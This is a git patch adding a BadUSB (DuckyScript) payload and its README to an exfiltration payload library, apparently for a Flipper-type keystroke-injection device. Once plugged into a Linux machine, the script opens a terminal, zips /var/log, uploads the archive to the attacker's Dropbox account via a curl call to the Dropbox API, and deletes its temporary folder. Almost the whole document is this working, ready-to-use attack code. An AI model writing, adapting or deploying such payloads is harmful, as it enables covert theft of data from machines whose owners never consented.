From b6494328325f24e65cd4b37fbc131d4b76131b46 Mon Sep 17 00:00:00 2001
From: aleff-github <alessandrogreco@autistici.org>
Date: Tue, 7 Mar 2023 11:57:46 +0100
Subject: [PATCH] [+] README.md file

---
 .../ExfiltrateLinuxLogFiles/README.md         | 33 ++++++++
 .../ExfiltrateLinuxLogFiles/payload.txt       | 80 +++++++++++++++++++
 2 files changed, 113 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
 create mode 100644 payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt

diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
new file mode 100644
index 0000000..1ea1e56
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
@@ -0,0 +1,33 @@
+ 
+# Exfiltrate Linux Log Files - BADUSB ✅
+
+A script used to take linux logs.
+
+**Category**: Exfiltration, Execution
+
+[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
+
+## Description
+
+A script used to take linux logs.
+
+Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Linux System
+* * Terminal that can be opened by the shortcommand CTRL-ALT t
+* DropBox Account for the access token
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Set your dropbox access token
+* Change if needed the folder path interessed (i.e. /var/log)
+* Change (if you think that it is necessary) the delay of the zipping operation
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
new file mode 100644
index 0000000..dbd546f
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -0,0 +1,80 @@
+REM ######################################################
+REM #                                                    |
+REM # Title        : Exfiltrate Linux Logs With Dropbox  |
+REM # Author       : Aleff                               |
+REM # Version      : 1.0                                 |
+REM # Category     : Exfiltration, Execution             |
+REM # Target       : Linux                               |
+REM #                                                    |
+REM ######################################################
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Dropbox Account
+REM     - - DROPBOX_ACCESS_TOKEN
+
+
+DELAY 1000
+CTRL-ALT t
+
+REM Required: Set here your Dropbox access TOKEN
+DELAY 2000
+DEFINE TOKEN example
+STRING ACCESS_TOKEN="
+STRING TOKEN
+STRING "
+ENTER
+
+
+DELAY 500
+STRING USER_NAME=$(whoami)
+ENTER
+
+REM Create random num
+DELAY 500
+STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
+ENTER
+
+REM Folder path
+DELAY 500
+STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
+ENTER
+
+REM Zip path
+DELAY 500
+STRING ZIP_NAME="$RANDOM.zip"
+ENTER
+DELAY 500
+STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
+ENTER
+
+REM Default log path
+DELAY 500
+STRING LOG_PATH="/var/log/"
+ENTER
+
+DELAY 500
+STRING zip -r "$ZIP_PATH" "$LOG_PATH"
+ENTER
+
+REM Delay of zipping operation - it depends
+DELAY 10000
+
+DELAY 500
+STRING DROPBOX_FOLDER="/$ZIP_NAME"
+ENTER
+
+REM Send to Dropbox function
+DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
+DELAY 500
+STRING curl -X POST 
+STRING DROPBOX_API_LINK 
+STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
+ENTER
+
+REM Send timing - it depends
+DELAY 5000
+
+DELAY 500
+STRING rm -rf "$TMP_FOLDER_PATH"
+ENTER